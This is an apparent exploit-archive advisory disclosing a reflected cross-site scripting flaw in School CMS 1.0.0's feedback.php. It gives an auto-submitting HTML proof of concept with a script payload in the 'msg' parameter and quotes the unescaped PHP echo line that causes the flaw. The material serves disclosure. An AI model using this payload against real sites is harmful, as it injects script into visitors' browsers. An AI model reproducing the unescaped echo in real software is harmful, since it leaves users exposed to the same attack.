School CMS 1.0.0 Cross Site Scripting
Posted on 22 November 2017
___________________________________________________ | | Exploit Title: school cms Cross Site Scripting | Exploit Author: Ashiyane Digital security Team | Vendor Homepage : https://www.sourcecodester.com/php/5400/school-website-cms.html | Software Link: https://www.sourcecodester.com/sites/default/files/download/arukumar/school_cms.zip | Version: 1.0.0 | Date: 2017-11-18 | Category: Webapps | Language: PHP | Tested on: Kali-Linux / FireFox |__________________________________________________ | | Exploit : | | <html> | <body onload="document.exploit.submit()"> | <form method="get" action="http://TARGET/PATH/feedback.php" | <input type="hidden" name="msg" value="1"/><script>alert(`M.R.S.L.Y`)</script>" /> | </form> | </body> | </html> |__________________________________________________ | | Vulnerable method : | $_GET | | Vulnerable File: | feedback.php | | Vulnerable code: | | line 203 : | <td id="error" style="color:#FF0000;"><?PHP echo "<font color=#FF0000>$_REQUEST[msg]</font>"; ?></td> |__________________________________________________ | | Discovered By : M.R.S.L.Y |__________________________________________________